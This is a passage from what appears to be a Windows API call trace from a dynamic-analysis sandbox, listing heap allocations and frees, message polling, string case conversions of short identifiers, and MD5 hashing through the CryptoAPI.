HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6af8 | out: hHeap=0x25c0000) returned 1 [0267.772] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0267.772] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0267.772] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0267.772] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0267.772] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0267.773] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0267.773] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0267.773] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0267.773] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0267.773] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0267.773] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0267.773] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0267.773] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0267.773] CryptAcquireContextA (in: phProv=0x8befe0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8befe0*=0xad2be8) returned 1 [0267.774] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0267.774] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0267.775] CharUpperBuffW (in: lpsz="A1300D00639", cchLength=0xb | out: lpsz="A1300D00639") returned 0xb [0267.775] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0267.775] CharUpperBuffW (in: lpsz="SSA1300D00639", cchLength=0xd | out: lpsz="SSA1300D00639") returned 0xd [0267.775] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0267.775] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0267.775] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0267.775] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0267.775] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0267.775] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0267.789] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0267.789] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0267.789] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0267.789] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0267.789] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0267.789] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0267.789] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0267.789] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0267.789] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0267.789] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0267.789] CharUpperBuffW (in: lpsz="A4E00301934", cchLength=0xb | out: lpsz="A4E00301934") returned 0xb [0267.789] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.789] CharUpperBuffW (in: lpsz="SSA4E00301934", cchLength=0xd | out: lpsz="SSA4E00301934") returned 0xd [0267.790] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.790] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.790] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.790] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.790] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.790] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.790] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.790] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0267.790] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0267.790] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0267.790] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0267.791] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0267.791] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0267.791] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0267.791] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0267.791] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0267.791] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0267.791] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0267.791] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0267.791] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0267.791] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0267.791] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0267.791] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0267.791] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0267.791] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0267.791] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0267.792] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.792] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.792] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0267.792] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0267.792] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0267.792] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0267.792] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0267.792] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0267.792] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0267.792] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0267.792] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0267.792] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0267.792] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0267.793] CryptCreateHash (in: hProv=0xad2be8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8bef50 | out: phHash=0x8bef50) returned 1 [0267.793] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0267.793] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0267.793] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0267.793] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0267.793] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0267.793] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0267.793] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17b8 [0267.793] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.793] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0267.793] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0267.793] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0267.793] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0267.793] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0267.793] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0267.793] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0267.793] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0267.793] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0267.794] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.794] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.794] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0267.794] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0267.794] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0267.794] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0267.794] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0267.794] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0267.794] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.794] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0267.794] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0267.794] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0267.794] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0267.794] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0267.794] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0267.794] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0267.794] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0267.794] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0267.794] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0267.794] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0267.795] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0267.795] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f170 [0267.795] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0267.795] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0267.795] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0267.795] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1888 [0267.795] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0267.795] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17e8 [0267.795] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0267.795] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0267.795] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.795] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0267.795] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0267.795] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0267.795] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466db0 [0267.795] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f170 [0267.795] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0267.795] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dc8 [0267.796] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.796] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0267.796] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0267.796] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0267.796] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0267.796] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6af8 [0267.796] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1828 [0267.796] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0267.796] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0267.796] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0267.796] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0267.796] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0267.796] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0267.796] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0267.796] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0267.796] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0267.796] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0267.796] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0267.796] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0267.796] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0267.797] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0267.797] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0267.797] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0267.797] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0267.797] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0267.797] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0267.797] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dc8 [0267.797] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0267.797] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0267.797] CryptHashData (hHash=0xaa57a0, pbData=0x24b17e8, dwDataLen=0x3, dwFlags=0x1) returned 1 [0267.797] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0267.797] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e50 [0267.797] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0267.797] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0267.797] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0267.797] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0267.797] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0267.797] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0267.798] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0267.798] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0267.798] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0267.798] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0267.798] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0267.798] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0267.798] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0267.798] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0267.798] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0267.798] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0267.798] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0267.798] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0267.798] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0267.798] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0267.798] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0267.798] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0267.798] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466dd0 [0267.798] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f200 [0267.799] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0267.799] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0267.799] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0267.799] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0267.799] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0267.799] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dc8 [0267.799] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0267.799] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0267.799] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0267.799] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0267.799] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0267.799] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0267.799] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dc8 [0267.799] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0267.799] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0267.799] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0267.799] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0267.800] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0267.800] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0267.800] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0267.800] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0267.800] HeapFree (in: 